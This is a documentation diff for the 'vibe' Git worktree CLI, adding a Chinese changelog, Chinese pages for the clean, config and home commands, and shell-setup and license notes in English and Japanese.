+    The package installs its license documentation under `/usr/share/doc/vibe/`:
+    `copyright` (vibe's own MIT terms, in Debian's machine-readable DEP-5 format)
+    and `THIRD-PARTY-LICENSES.md` (the notices for the Rust crates statically
+    linked into the binary).
+
   </TabItem>
   <TabItem label="Other Distributions">
     ```bash frame="terminal"

--- a/packages/docs/src/content/docs/ja/index.mdx
+++ b/packages/docs/src/content/docs/ja/index.mdx
@@ -49,9 +49,14 @@ import { Card, CardGrid } from "@astrojs/starlight/components";
 # Homebrewでインストール (macOS)
 brew install kexi/tap/vibe
 
+# シェル統合をセットアップ (~/.zshrcに追加)
+vibe() { eval "$(command vibe "$@")" }
+
 # 新機能用のWorktreeを作成
 vibe start feat/new-feature
 
 # 作業完了後、クリーンアップ
 vibe clean
 ```
+
+> **注:** 他のシェルをお使いですか？ Bash、Fish、Nushell、PowerShell の設定は[はじめに](/ja/getting-started/#2-シェルを設定)ガイドをご覧ください。

--- a/packages/docs/src/content/docs/ja/installation.mdx
+++ b/packages/docs/src/content/docs/ja/installation.mdx
@@ -118,6 +118,11 @@ WSL2ユーザーは、使用しているディストリビューションに応�
     sudo apt remove vibe
     ```
 
+    このパッケージは、ライセンス関連のドキュメントを `/usr/share/doc/vibe/` 配下に
+    インストールします。`copyright` は vibe 自身の MIT ライセンス条項（Debian の
+    機械可読形式 DEP-5）、`THIRD-PARTY-LICENSES.md` はバイナリに静的リンクされた
+    Rust クレート群のライセンス表示です。
+
   </TabItem>
   <TabItem label="その他のディストリビューション">
     ```bash frame="terminal"

--- a/packages/docs/src/content/docs/zh/changelog.mdx
+++ b/packages/docs/src/content/docs/zh/changelog.mdx
@@ -1,0 +1,694 @@
+---
+title: 更新日志
+description: vibe 的版本历史与发行说明
+---
+
+vibe 的所有重要变更都记录在这里。
+
+## v2.2.0
+
+**发布日期：** 2026年7月26日
+
+### 修复
+
+- nushell 包装函数现在真正可以工作了。此前的包装函数从来无法切换你所在 shell 的目录（`nu -c` 是在子进程中执行 `cd` 的），会拒绝所有带标志的调用（例如 `vibe start --dry-run`，因为缺少 `--wrapped`），也无法处理包含单引号的路径。新的包装函数以纯数据的形式接收 worktree 路径，因此 `vibe start` / `vibe jump` 能让你的 nushell 会话切换到正确的目录 —— 包含引号的路径也没问题。**需要你操作：** 请将 `config.nu` 中已粘贴的包装函数替换为 `vibe shell-setup --shell nushell` 输出的新代码片段（需要 vibe 2.2.0 或更高版本；旧的包装函数仍保持旧有行为）。
+- PowerShell 包装函数现在能正确处理包含单引号或通配符字符（`[`、`]`）的路径，并且在命令没有产生任何输出时（例如 `vibe config`）不再报错。**需要你操作：** 请从安装设置文档中重新粘贴包装函数（需要 vibe 2.2.0 或更高版本）。
+- bash、zsh 和 fish 不受影响：它们的包装函数和输出与之前的版本逐字节完全一致。
+
+---
+
+## v2.1.1
+
+**发布日期：** 2026年7月17日
+
+### 修复
+
+- GitHub Releases 的可下载资源中不再混入多余的 `package.json` 和 `THIRD-PARTY-LICENSES.md` 文件。发行页面现在只列出预编译的二进制文件和 `.deb` 软件包，因此不会再让人纠结该下载哪一个。
+
+---
+
+## v2.1.0
+
+**发布日期：** 2026年6月23日
+
+### 新增
+
+- 现在可以完整加载 git 子模块内的 `.vibe.toml` 文件。已信任的子模块配置会被读取，配置会从 worktree 内部（而不仅仅是原始 checkout）被识别，并且子模块目录会从正确的来源复制，因此子模块的内容会出现在 worktree 路径下。如果你的仓库使用了子模块，它们的 `.vibe.toml` 文件现在会如你所期望地参与到合并后的配置中。
+
+### 修复
+
+- 创建 worktree 时会再次显示进度树。此前交互式进度显示出现了回归，会一直隐藏直到操作结束；现在它会在 worktree 创建过程中实时输出。
+
+---
+
+## v2.0.0
+
+**发布日期：** 2026年6月19日
+
+### 新增
+
+- 原生支持 Windows（x64）。现在在 Windows 上通过 npm 安装 `@kexi/vibe`，会拉取 `@kexi/vibe-win32-x64` 二进制软件包并运行原生二进制文件。Windows 上无法使用写时复制克隆，因此创建 worktree 时会回退为标准的文件复制；除此之外，所有命令和行为都与 Linux 和 macOS 一致。
+
+### 变更
+
+- vibe 现在是一个独立的 Rust 二进制程序，而不再是 Node.js/Bun 应用。npm 软件包（`@kexi/vibe`）附带一个轻量启动器 shim，用于运行适用于你所在平台的预编译二进制文件，该二进制文件会作为按平台划分的 `optionalDependency` 被拉取。所有命令、标志、输出以及 SHA-256 信任模型均保持不变 —— 你现有的 `eval "$(vibe start ...)"` 设置和 `.vibe.toml` 文件都会像以前一样继续工作。这次主版本号的提升是为了标记运行时与分发方式的全面改造，而不是因为 CLI 行为有任何变化。
+
+### 移除
+
+- 不再发布 Deno / JSR 分发渠道（`deno install jsr:@kexi/vibe`）。请改用 npm、Homebrew、`.deb` 软件包或预编译二进制文件进行安装。
+
+### 修复
+
+- `vibe start --force` 现在会真正遵循该标志。此前它虽然会被解析但被忽略；现在它会跳过确认提示 —— 无论是导航到已有分支的 worktree，还是覆盖某个属于其他分支的冲突 worktree。
+- `vibe start --reuse`（以及 `vibe scratch --reuse`）现在会真正遵循该标志。此前它虽然会被解析但被忽略；现在当目标路径与另一个分支冲突时，它会自动选择「复用已有的 worktree」（与 `--force` 相反）。同时传入 `--force` 和 `--reuse` 会因相互矛盾而被拒绝。
+- `vibe scratch` 现在能在 Windows 上生成日期正确的分支名。此前在 Windows 二进制文件上，时间戳会回退到一个错误的日期（始终是 1970 年）；现在它会生成有效的 `scratch/YYYYMMDD-HHMMSS` 名称。
+- 加固了 stdout 上输出的 worktree 路径，使其能够抵御换行符注入，与 `cd` 输出上已有的防护保持一致，因此包含换行符的路径不再能注入第二条 shell 命令。
+
+---
+
+## v1.8.1
+
+**发布日期：** 2026年6月2日
+
+### 修复
+
+- 通过 Homebrew 分发的二进制文件在非 Nix 主机上启动时不再因 dyld 错误而中止。发行版二进制文件现在使用官方 Bun 工具链构建，因此不再依赖 `/nix/store` 中的动态库。
+
+---
+
+## v1.8.0
+
+**发布日期：** 2026年6月1日
+
+### 新增
+
+- Windows 现在拥有原生的 `robocopy` 复制策略。当写时复制不可用时，vibe 会回退到 `robocopy`，从而在 Windows 上更快、更可靠地复制 worktree 文件。
+
+### 变更
+
+- 文档化了如何在 WSL2 中挂载 Btrfs 卷，以便在 Windows 上启用写时复制。请参阅[安装](/zh/installation/)。
+
+### 修复
+
+- Windows 上的复制失败现在会在错误信息中输出底层 `robocopy` 的 stdout，让复制失败更容易诊断。
+
+---
+
+## v1.7.1
+
+**发布日期：** 2026年5月31日
+
+这是一个维护版本，用于加固 Nix 发布流水线。flake 版本号现在从 `package.json` 推导（单一信息来源），而不再是硬编码的字面量，因此发布标签不会再携带过时的版本号。发布后的 flake 更新也被限定了范围，不再改动 pnpm / native 的工具版本锁定 —— 此前一次无差别的版本重写曾导致 v1.7.0 的源码构建失败。对用户没有可见变化。
+
+---
+
+## v1.7.0
+
+**发布日期：** 2026年5月31日
+
+### 新增
+
+- 新增将 vibe 与外部工具集成的实用指南文档 —— [tmux](/zh/recipes/tmux/)、[cmux](/zh/recipes/cmux/) 和 [direnv](/zh/recipes/direnv/)。概览请参阅[实用指南](/zh/recipes/)。
+
+### 变更
+
+- Nix flake 的默认软件包（`nix run github:kexi/vibe`、`nix profile install github:kexi/vibe`）现在会从源码构建 vibe 以实现可复现的安装，而不再下载预编译的发行版二进制文件。如果你更希望使用预编译的快速路径，请使用 `#binary` 输出（例如 `nix run github:kexi/vibe#binary`）。请参阅[安装 → Nix](/zh/installation/)。
+
+---
+
+## v1.6.0
+
+**发布日期：** 2026年5月16日
+
+### 新增
+
+- 为 `vibe` 新增 zsh shell 自动补全。在 `~/.zshrc` 中依次添加 `autoload -Uz compinit && compinit` 和 `eval "$(vibe shell-setup --shell zsh --with-completion)"`（必须按此顺序 —— `compinit` 要在 `eval` 之前执行），即可获得子命令、标志、`vibe start <Tab>` 的本地分支名以及 `vibe jump <Tab>` 的 worktree 分支名的 Tab 补全。详情请参阅 [Shell 设置](/zh/setup/)和 [`vibe shell-setup`](/zh/commands/shell-setup/)。
+
+---
+
+## v1.5.2
+
+**发布日期：** 2026年5月16日
+
+这是一个用于挽救 v1.5.1 的维护版本。第一次尝试修复 CI（`--force npm@11`）仍然失败，因为 Node 22.22 内置的 npm 10.x 缺少 `@npmcli/arborist` 的 `promise-retry` 依赖，无法自我升级。本次发布将发布任务切换到 Node 24，其内置的 npm 11.x 已经支持 OIDC 可信发布 —— 无需自我升级。v1.5.0 / v1.5.1 中面向用户的变更（fish shell 自动补全）在此首次真正发布。
+
+---
+
+## v1.5.1
+
+**发布日期：** 2026年5月16日
+
+这是一个用于挽救 v1.5.0 的维护版本。v1.5.0 的标签虽然打出来了，但从未真正发布到 npm 仓库 —— 发布工作流在 `npm install -g npm@latest` 期间失败（npm 自我升级的竞态问题，表现为 `Cannot find module 'promise-retry'`）。本次发布将升级固定为 `npm@11` 并加上 `--force`，同时首次发布 v1.5.0 的内容（fish shell 自动补全）。功能说明请参阅下方的 v1.5.0 条目。
+
+---
+
+## v1.5.0
+
+**发布日期：** 2026年5月16日
+
+### 新增
+
+- 为 `vibe` 新增 fish shell 自动补全。运行 `vibe shell-setup --shell fish --with-completion | source`（或将该行添加到 `~/.config/fish/config.fish`），即可获得子命令、标志、`vibe start <Tab>` 的本地分支名以及 `vibe jump <Tab>` 的 worktree 分支名的 Tab 补全。详情请参阅 [Shell 设置](/zh/setup/)和 [`vibe shell-setup`](/zh/commands/shell-setup/)。
+
+---
+
+## v1.4.3
+
+**发布日期：** 2026年5月12日
+
+维护版本。参考近期 npm 供应链投毒事件的模式，加固了发布与 CI 流水线以抵御供应链攻击。对用户没有可见变化。
+
+---
+
+## v1.4.2
+
+**发布日期：** 2026年4月29日
+
+维护版本。确认在修正 PAT 权限之后，Nix flake 自动更新流水线可以完整执行。对用户没有可见变化。
+
+---
+
+## v1.4.1
+
+**发布日期：** 2026年4月29日
+
+维护版本。端到端验证了已恢复的 Nix flake 自动更新流水线。对用户没有可见变化。
+
+---
+
+## v1.4.0
+
+**发布日期：** 2026年4月29日
+
+### 变更
+
+- 恢复了每次发布之后自动更新 Nix flake 的流程 —— Nix 用户将再次能在 `develop` 分支上获得每个版本对应的最新 `flake.nix` / `flake.lock`
+
+---
+
+## v1.3.0
+
+**发布日期：** 2026年4月28日
+
+### 新增
+
+- `vibe scratch` 命令 —— 创建一个分支名自动生成为 `scratch/<YYYYMMDD-HHMMSS>` 的 worktree，便于快速试验
+- `vibe rename` 命令 —— 一步完成当前 worktree 的分支重命名和目录移动，适合把 `vibe scratch` 创建的 worktree 提升为正式名称
+- `vibe jump` 现在在非精确匹配时会排除 scratch worktree，以免临时的 scratch 出现在跳转候选中
+
+### 修复
+
+- `vibe rename feat/hoge` 现在会保留分支名中的斜杠（此前会被净化为 `feat-hoge`）
+- `vibe rename` 现在可以在次级 worktree 中运行
+
+---
+
+## v1.2.0
+
+**发布日期：** 2026年4月27日
+
+### 新增
+
+- 支持通过 Nix 安装 —— 现在可以使用 Nix flakes 安装 vibe，实现可复现的安装
+
+---
+
+## v1.1.1
+
+**发布日期：** 2026年4月8日
+
+### 修复
+
+- 修正了删除 worktree 命令中 `--force` 标志的位置
+
+---
+
+## v1.1.0
+
+**发布日期：** 2026年3月8日
+
+### 新增
+
+- `vibe start` 通过 DWIM（Do What I Mean）支持检出远程分支 —— 自动检测并检出远程分支
+
+---
+
+## v1.0.0
+
+**发布日期：** 2026年2月26日
+
+### 变更
+
+- 移除 `vibe copy` 命令
+
+---
+
+## v0.23.0
+
+**发布日期：** 2026年2月26日
+
+### 新增
+
+- `vibe copy` 命令，使用写时复制从主 worktree 复制文件和目录
+- Claude Code worktree 钩子集成（`start` 和 `clean` 命令的 `--claude-code-worktree-hook` 模式）
+- 为 Claude Code 提供 `WorktreeCreate` / `WorktreeRemove` 钩子支持
+
+### 修复
+
+- `--target` 选项的路径校验
+- 删除 worktree 之前，在钩子模式下进行防御性的目录切换
+
+---
+
+## v0.22.2
+
+**发布日期：** 2026年2月13日
+
+### 修复
+
+- 将原生模块（vibe-native）嵌入到编译后的发行版二进制文件中
+- 为 Bun 编译的二进制文件添加直接 require `.node` 的回退方案
+
+---
+
+## v0.22.1
+
+**发布日期：** 2026年2月12日
+
+### 修复
+
+- 在 Bun 运行时上启用 CoW（写时复制）原生克隆
+
+---
+
+## v0.22.0
+
+**发布日期：** 2026年2月10日
+
+### 新增
+
+- `jump` 命令支持模糊匹配（即使有拼写错误或只输入部分内容也能匹配）
+- `jump` 命令支持 MRU（最近使用）排序（最近使用过的 worktree 会排在前面）
+
+---
+
+## v0.21.0
+
+**发布日期：** 2026年2月8日
+
+### 新增
+
+- `vibe shell-setup` 命令，用于自动生成 shell 包装函数
+
+### 修复
+
+- 修正 `start` 命令中 console.log 语句的缩进
+
+---
+
+## v0.20.0
+
+**发布日期：** 2026年2月8日
+
+### 新增
+
+- `vibe jump` 命令，可通过分支名快速导航到 worktree（支持部分匹配、词边界匹配和交互式选择）
+- `vibe home` 命令，用于返回主 worktree
+
+### 修复
+
+- 防止 shell 注入：对 `cd` 输出中的单引号和特殊字符进行转义
+- 成功消息现在以绿色显示，而不再看起来像是错误输出
+- 支持 `NO_COLOR` 环境变量以控制 ANSI 彩色输出
+
+---
+
+## v0.19.2
+
+**发布日期：** 2026年2月8日
+
+### 修复
+
+- 修正 `brew upgrade` 命令，使其使用完整限定的 tap 名称
+
+---
+
+## v0.19.1
+
+**发布日期：** 2026年2月7日
+
+### 修复
+
+- 为兼容 tsdown 而进行的内部构建配置修复
+
+---
+
+## v0.19.0
+
+**发布日期：** 2026年2月7日
+
+### 新增
+
+- `start` 命令新增 `--track` 选项：与 `--base` 搭配时可显式启用远程跟踪分支的创建
+- 使用 `--base` 时默认行为改为 `--no-track`，避免自动创建远程跟踪分支
+
+### 修复
+
+- Homebrew formula 不再与 `vibe-beta` 冲突，稳定版和 beta 版可以共存
+
+---
+
+## v0.18.0
+
+**发布日期：** 2026年2月2日
+
+### 新增
+
+- **Deno/JSR 分发**：现在可以通过 `deno run jsr:@kexi/vibe` 直接运行 vibe
+- **Beta 渠道**：提供名为 `vibe-beta` 的 Homebrew beta formula，用于提前试用新功能
+
+---
+
+## v0.17.0
+
+**发布日期：** 2026年1月31日
+
+### 新增
+
+- 可通过 `vibe.concurrency.copy` 配置项调整复制并发度
+
+---
+
+## v0.16.1
+
+**发布日期：** 2026年1月26日
+
+### 修复
+
+- 为兼容 tsdown v0.20.1 而进行的内部构建配置修复
+
+---
+
+## v0.16.0
+
+**发布日期：** 2026年1月26日
+
+### 新增
+
+- 检测主 worktree 已被删除的情况，并给出可操作的错误提示
+
+### 修复
+
+- 通过正确的 import map 配置，原生克隆支持现在可以正常工作
+
+---
+
+## v0.15.1
+
+**发布日期：** 2026年1月24日
+
+### 修复
+
+- npm 软件包的内部构建配置修复
+
+---
+
+## v0.15.0
+
+**发布日期：** 2026年1月24日
+
+### 新增
+
+- `vibe start` 命令新增 `--base` 选项，用于显式指定基准分支
+
+### 修复
+
+- 通过限制渲染调用频率提升了 spinner 的稳定性，避免卡死
+
+---
+
+## v0.14.0
+
+**发布日期：** 2026年1月19日
+
+### 新增
+
+- **XDG 回收站支持**：`vibe clean` 现在会使用系统回收站
+  - Linux：符合 XDG Base Directory 规范的回收站
+  - macOS：与 Finder 的废纸篓集成
+
+### 修复
+
+- 提升了 `vibe clean` 的幂等性，使并发执行更加稳定
+
+---
+
+## v0.13.0
+
+**发布日期：** 2026年1月18日
+
+### 新增
+
+- 发布工作流的 Twitter 公告模板
+- Markdown 文件同步规则（_.md / _.ja.md 成对）
+- 用于引导式发布的 `vibe-release-new-version` Claude Code 命令
+
+### 修复
+
+- 处理了 PR 评审意见
+- 将 JSR 依赖移动到 devDependencies 以便正确构建
+- 打包 JSR 依赖，以便在没有仓库配置的情况下也能通过 npx 使用
+
+---
+
+## v0.12.0
+
+**发布日期：** 2026年1月18日
+
+### 新增
+
+- **多运行时支持**：可在 Node.js/npm/npx 和 Bun 环境中运行 vibe
+- **RuntimeAbstractionLayer**：面向 Node.js 和 Bun 的统一运行时抽象
+- **AppContext 依赖注入**：通过 DI 模式提升可测试性
+
+### 变更
+
+- **vibe-native**：从 C 迁移到 Rust（napi-rs），以获得更好的安全性和可维护性
+- **vibe-native**：将多个软件包整合为一个统一的软件包
+
+### 修复
+
+- 改进了原生模块的错误处理
+- 更好的 Windows 检测逻辑
+- 为较慢的网络连接延长了 mise 的 HTTP 超时时间
+- 各种 e2e 测试的修复与改进
+
+---
+
+## v0.9.0
+
+**发布日期：** 2026年1月16日
+
+### 新增
+
+- 符合 GNU 编码标准的 CLI 选项
+  - `--verbose` / `-V`：启用详细输出
+  - `--quiet` / `-q`：抑制非必要输出
+  - `--dry-run` 的短选项别名 `-n`
+  - 检测未知选项并给出有帮助的错误信息
+- `vibe clean` 命令的**快速删除**
+  - 通过重命名为 `.vibe-trash-*` 实现 O(1) 的瞬时目录删除
+  - 后台清理，改善使用体验
+  - 基准测试：29 秒 → 2 秒（34.2 万个文件，快 14 倍）
+  - `[clean] fast_remove` 配置项（默认启用）
+
+### 变更
+
+- 使用 `errorLog` 函数改进了帮助文本的排版
+
+### 修复
+
+- 防止 `clean` 命令中的 shell 注入
+- 针对 clean 操作的安全性改进
+
+---
+
+## v0.8.0
+
+**发布日期：** 2026年1月14日
+
+### 新增
+
+- `vibe upgrade` 命令，用于检查更新并显示升级说明
+- `vibe start` 新增 `--dry-run` 选项，可在不实际执行的情况下预览操作
+- `vibe clean` 命令新增 `--delete-branch` / `--keep-branch` 选项
+- `vibe clean` 新增 `--force` / `-f` 选项，用于跳过确认提示
+- `.vibe.toml` 中新增 `[clean] delete_branch` 配置项
+
+### 变更
+
+- Claude Actions 从 OAuth 切换为 API key 认证
+
+### 修复
+
+- 删除包含未提交更改的 worktree 时添加 `--force` 标志
+
+---
+
+## v0.7.0
+
+**发布日期：** 2026年1月13日
+
+### 新增
+
+- 为文档站点添加 OGP meta 标签，以便在社交网络上生成预览
+
+### 变更
+
+- 改为 pnpm workspace，并加入文档的 CI 检查
+- 为供应链安全配置了最小发布时长（minimum release age）
+
+### 修复
+
+- `vibe clean` 现在会输出返回主 worktree 的 cd 命令
+
+---
+
+## v0.6.0
+
+**发布日期：** 2026年1月13日
+
+### 新增
+
+- 通过外部脚本**自定义 worktree 路径**
+  - 配置 `path_script` 以动态决定 worktree 的目录路径
+  - 环境变量：`VIBE_REPO_NAME`、`VIBE_BRANCH_NAME`、`VIBE_SANITIZED_BRANCH`、`VIBE_REPO_ROOT`
+
+### 变更
+
+- 将 deno compile 命令统一到 deno task 中
+
+---
+
+## v0.5.2
+
+**发布日期：** 2026年1月13日
+
+### 修复
+
+- 为 CI/发布工作流中的所有 compile 命令添加了 `--allow-ffi` 标志
+
+---
+
+## v0.5.1
+
+**发布日期：** 2026年1月13日
+
+### 新增
+
+- 文档站点（基于 Starlight）
+- 页头的 GitHub Star 按钮
+- Windows、Nushell、PowerShell 和 Linux 的安装指南
+- 通过 GitHub Actions 自动部署文档
+
+### 变更
+
+- 并行化目录复制以提升性能
+- 在文件操作过程中显示复制策略的名称
+
+---
+
+## v0.5.0
+
+**发布日期：** 2026年1月10日
+
+### 新增
+
+- `--no-hooks` 选项，用于在 `vibe start` 时跳过钩子执行
+- `--no-copy` 选项，用于在 `vibe start` 时跳过文件复制
+- GitHub Sponsors 和 Patreon 赞助配置
+
+### 变更
+
+- 改进了开发工作流的文档
+
+---
+
+## v0.4.0
+
+**发布日期：** 2026年1月8日
+
+### 新增
+
+- 带性能优化的**复制策略**
+  - 使用 FFI 的原生克隆（macOS 上的 `clonefile`、Linux 上的 `FICLONE`）
+  - 为 APFS 和 Btrfs/XFS 提供写时复制（CoW）支持
+  - 跨文件系统复制时回退到 rsync
+- 支持使用 glob 模式的**目录复制**
+- 采用新标记格式改进进度显示
+
+### 变更
+
+- 重构 CopyService 以提升性能
+- 增强进度显示，输出更加清爽
+
+### 修复
+
+- CopyService 测试中的资源泄漏
+- 进度显示中的空标记行
+
+---
+
+## v0.3.0
+
+**发布日期：** 2026年1月2日
+
+### 新增
+
+- 面向仓库安全的**信任系统**
+  - 仓库必须被显式信任之后才能运行钩子
+  - `vibe trust` 命令，用于管理受信任的仓库
+  - 以安全优先的方式防止恶意钩子被执行
+- 幂等的 `vibe start` —— 在已存在的 worktree 上运行时会直接复用它
+
+### 变更
+
+- 将日文界面消息替换为英文，以面向国际用户
+- 改进了仓库根路径的规范化
+
+### 修复
+
+- 仓库根路径规范化的问题
+
+---
+
+## v0.2.0
+
+**发布日期：** 2025年12月28日
+
+### 新增
+
+- 面向自动化工作流的**钩子系统**
+  - `pre_start`、`post_start`、`pre_clean`、`post_clean` 钩子
+  - 用于向 worktree 复制文件的 `files` 配置
+- 支持本地配置（`.vibe.local.toml`）
+- `vibe config` 命令，用于管理设置
+
+### 变更
+
+- 增强了 worktree 管理
+- 改进了 shell 集成
+
+---
+
+## v0.1.0
+
+**发布日期：** 2025年12月28日
+
+### 新增
+
+- 首个版本
+- 通过 `vibe start` 实现基本的 worktree 创建
+- 通过 `vibe clean` 清理 worktree
+- 多 shell 支持（Bash、Zsh、Fish、Nushell、PowerShell）
+- 支持 `.vibe.toml` 配置文件

--- a/packages/docs/src/content/docs/zh/commands/clean.mdx
+++ b/packages/docs/src/content/docs/zh/commands/clean.mdx
@@ -1,0 +1,206 @@
+---
+title: vibe clean
+description: 删除当前 worktree 并返回主仓库
+sidebar:
+  order: 3
+---
+
+import { Badge } from "@astrojs/starlight/components";
+
+`clean` 命令会删除当前 worktree 并让你返回主仓库。
+
+## 使用方法
+
+```bash
+vibe clean
+```
+
+## 选项
+
+### `--force`, `-f`
+
+存在未提交的更改时跳过确认提示。
+
+```bash
+vibe clean --force
+```
+
+### `--delete-branch`
+
+删除 worktree 后一并删除分支。
+
+```bash
+vibe clean --delete-branch
+```
+
+### `--keep-branch`
+
+删除 worktree 后保留分支。该选项会覆盖配置中的 `delete_branch` 设置。
+
+```bash
+vibe clean --keep-branch
+```
+
+### `-V`, `--verbose`
+
+显示详细输出，包括所执行的 git 命令。
+
+```bash
+vibe clean --verbose
+```
+
+### `-q`, `--quiet`
+
+抑制非必要的输出。
+
+```bash
+vibe clean --quiet
+```
+
+### `--claude-code-worktree-hook` <Badge text="v0.23.0+" />
+
+Claude Code WorktreeRemove 钩子模式。从 stdin 读取 worktree 路径并删除该 worktree。
+
+```bash
+vibe clean --claude-code-worktree-hook --force
+```
+
+配置详情请参阅 [Claude Code 集成](/zh/configuration/hooks/#claude-code-integration)。
+
+## 配置
+
+可以在 `.vibe.toml` 中配置默认行为：
+
+```toml
+[clean]
+delete_branch = true  # 清理时默认删除分支
+```
+
+| 选项            | 默认值  | 说明                     |
+| --------------- | ------- | ------------------------ |
+| `delete_branch` | `false` | 删除 worktree 后删除分支 |
+
+### 快速删除（性能优化）
+
+默认情况下，vibe 采用快速删除策略：先将 worktree 目录移动到临时位置，再在后台异步删除。这使得即便是大型仓库，`vibe clean` 也能瞬间完成。
+
+可以在 `~/.config/vibe/settings.json` 中配置：
+
+```json
+{
+  "version": 3,
+  "clean": {
+    "fast_remove": true
+  }
+}
+```
+
+| 选项          | 默认值 | 说明                                |
+| ------------- | ------ | ----------------------------------- |
+| `fast_remove` | `true` | 使用快速异步删除（移动 + 后台删除） |
+
+**工作原理：**
+
+不同平台的行为有所不同：
+
+- **macOS**：通过 Finder 移动到系统废纸篓。需要时可以恢复，并由操作系统负责可靠的清理。
+- **Linux**：移动到 XDG 回收站。在支持的环境中可以从桌面文件管理器恢复。
+- **Windows**：移动到回收站。需要时可以恢复，并与操作系统的行为保持一致。
+
+如果系统回收站不可用或操作失败，vibe 会回退到将 worktree 移动到系统临时目录（`/tmp` 或 `%TEMP%`）并在后台删除。临时目录会在系统重启时自动清理。
+
+**详细流程：**
+
+1. 瞬间移动 worktree 目录（O(1) 的重命名操作）
+2. 对已清空的目录清理 git worktree 元数据
+3. 实际的文件删除在后台异步进行
+4. 之前遗留的 `.vibe-trash-*` 目录会被自动清理
+
+**注意：** 如果快速移动因任何原因失败（例如跨设备链接错误），会自动回退到传统删除方式。
+
+## 行为
+
+### 安全检查
+
+删除 worktree 之前，`vibe clean` 会：
+
+1. 检查是否有未提交的更改
+2. 如有更改则请求确认
+3. 执行 pre-clean 钩子
+4. 删除 worktree
+5. 执行 post-clean 钩子
+6. 将目录切换到主仓库
+
+### 未提交更改的警告
+
+```
+$ vibe clean
+存在未提交的更改。确定要执行清理吗? (y/N)
+```
+
+如果存在未提交的更改，vibe 会：
+
+- 显示警告
+- 请求确认
+- 只有在你明确确认后才继续
+
+## 钩子
+
+`clean` 命令支持用于清理任务的钩子：
+
+```toml
+[hooks]
+pre_clean = ["git stash"]
+post_clean = ["echo '清理完成'"]
+```
+
+| 钩子         | 执行时机           | 工作目录      |
+| ------------ | ------------------ | ------------- |
+| `pre_clean`  | 删除 worktree 之前 | 当前 worktree |
+| `post_clean` | 删除 worktree 之后 | 主仓库        |
+
+### pre-clean 钩子示例
+
+在清理前保存工作：
+
+```toml
+[hooks]
+pre_clean = [
+  "git stash --include-untracked",
+  "echo '更改已 stash'"
+]
+```
+
+### post-clean 钩子示例
+
+清理共享资源：
+
+```toml
+[hooks]
+post_clean = [
+  "docker-compose down",
+  "echo '清理完成'"
+]
+```
+
+## 工作流程
+
+```
+worktree (当前)
+     │
+     ├── 执行 pre_clean 钩子
+     │
+     ├── git worktree remove
+     │
+     ├── 执行 post_clean 钩子
+     │
+     └── cd 到主仓库
+            │
+            ▼
+主仓库 (新的当前位置)
+```
+
+## 相关内容
+
+- [start](/zh/commands/start/) - 创建 worktree
+- [钩子](/zh/configuration/hooks/) - 配置清理钩子

--- a/packages/docs/src/content/docs/zh/commands/config.mdx
+++ b/packages/docs/src/content/docs/zh/commands/config.mdx
@@ -1,0 +1,60 @@
+---
+title: vibe config
+description: 显示当前配置
+sidebar:
+  order: 5
+---
+
+`config` 命令用于显示当前生效的配置。
+
+## 使用方法
+
+```bash
+vibe config
+```
+
+## 输出
+
+显示由 `.vibe.toml` 和 `.vibe.local.toml` 合并后的配置：
+
+```bash
+$ vibe config
+Copy:
+  files: [".env", ".env.local"]
+  dirs: ["node_modules", ".cache"]
+
+Hooks:
+  pre_start: ["echo 'Starting'"]
+  post_start: ["pnpm install", "pnpm build"]
+  pre_clean: ["git stash"]
+  post_clean: ["echo 'Done'"]
+```
+
+## 使用场景
+
+### 确认配置
+
+在创建 worktree 之前确认配置是否正确：
+
+```bash
+vibe config
+vibe start feat/new-feature
+```
+
+### 调试合并结果
+
+查看 `.vibe.toml` 与 `.vibe.local.toml` 是如何合并的：
+
+```bash
+# 查看合并后的结果
+vibe config
+
+# 与各个文件进行对比
+cat .vibe.toml
+cat .vibe.local.toml
+```
+
+## 相关内容
+
+- [配置](/zh/configuration/) - 如何配置 vibe
+- [.vibe.local.toml](/zh/configuration/local-config/) - 本地覆盖设置

--- a/packages/docs/src/content/docs/zh/commands/home.mdx
+++ b/packages/docs/src/content/docs/zh/commands/home.mdx
@@ -1,0 +1,80 @@
+---
+title: vibe home
+description: 不删除当前 worktree 直接返回主 worktree
+sidebar:
+  order: 4
+---
+
+`home` 命令会返回主 worktree，而不删除当前的次级 worktree。当你需要临时到主仓库确认某些内容，或切换到其他 worktree 时，这个命令非常有用。
+
+## 使用方法
+
+```bash
+vibe home
+```
+
+## 选项
+
+### `-V`, `--verbose`
+
+显示详细输出，包括主 worktree 的路径。
+
+```bash
+vibe home --verbose
+```
+
+### `-q`, `--quiet`
+
+抑制非必要的输出。
+
+```bash
+vibe home --quiet
+```
+
+## 行为
+
+在次级 worktree 中执行时，`vibe home` 会：
+
+1. 确认当前处于 git 仓库中
+2. 检查是否已经位于主 worktree
+3. 跳转到主 worktree 目录
+
+如果已经位于主 worktree，则显示提示信息且不做任何操作。
+
+## 示例
+
+```bash
+# 从次级 worktree 跳转到主 worktree
+vibe home
+
+# 已经位于主 worktree 的情况
+$ vibe home
+Already in the main worktree.
+```
+
+## 与 `vibe clean` 的对比
+
+| 特性          | `vibe home` | `vibe clean`      |
+| ------------- | ----------- | ----------------- |
+| 删除 worktree | 否          | 是                |
+| 返回主仓库    | 是          | 是                |
+| 保留 worktree | 是          | 否                |
+| 适用场景      | 临时跳转    | worktree 使用完毕 |
+
+## 工作流程
+
+```
+worktree (当前)
+     │
+     └── cd 到主仓库
+            │
+            ▼
+主仓库 (新的当前位置)
+     │
+     └── worktree 仍然存在（可以 cd 回去）
+```
+
+## 相关内容
+
+- [start](/zh/commands/start/) - 创建 worktree
+- [clean](/zh/commands/clean/) - 删除 worktree

--- a/packages/docs/src/content/docs/zh/commands/index.mdx
+++ b/packages/docs/src/content/docs/zh/commands/index.mdx
@@ -1,0 +1,76 @@
+---
+title: 命令概览
+description: 可用的 vibe 命令
+sidebar:
+  order: 1
+---
+
+vibe 提供了一组用于管理 Git Worktree 的简洁命令。
+
+## 命令一览
+
+| 命令                                 | 说明                                      |
+| ------------------------------------ | ----------------------------------------- |
+| `vibe start <branch> [--base <ref>]` | 使用新建或已有分支创建 worktree           |
+| `vibe scratch`                       | 创建以 scratch/ 开头的自动命名 worktree   |
+| `vibe jump <branch>`                 | 按分支名跳转到已有的 worktree             |
+| `vibe rename <new-name>`             | 重命名当前 worktree 的分支和目录          |
+| `vibe clean`                         | 删除当前 worktree 并返回主仓库            |
+| `vibe home`                          | 不删除当前 worktree 直接返回主 worktree   |
+| `vibe trust`                         | 信任配置文件                              |
+| `vibe untrust`                       | 取消对配置文件的信任                      |
+| `vibe config`                        | 显示当前配置                              |
+| `vibe upgrade`                       | 检查更新并显示升级方法                    |
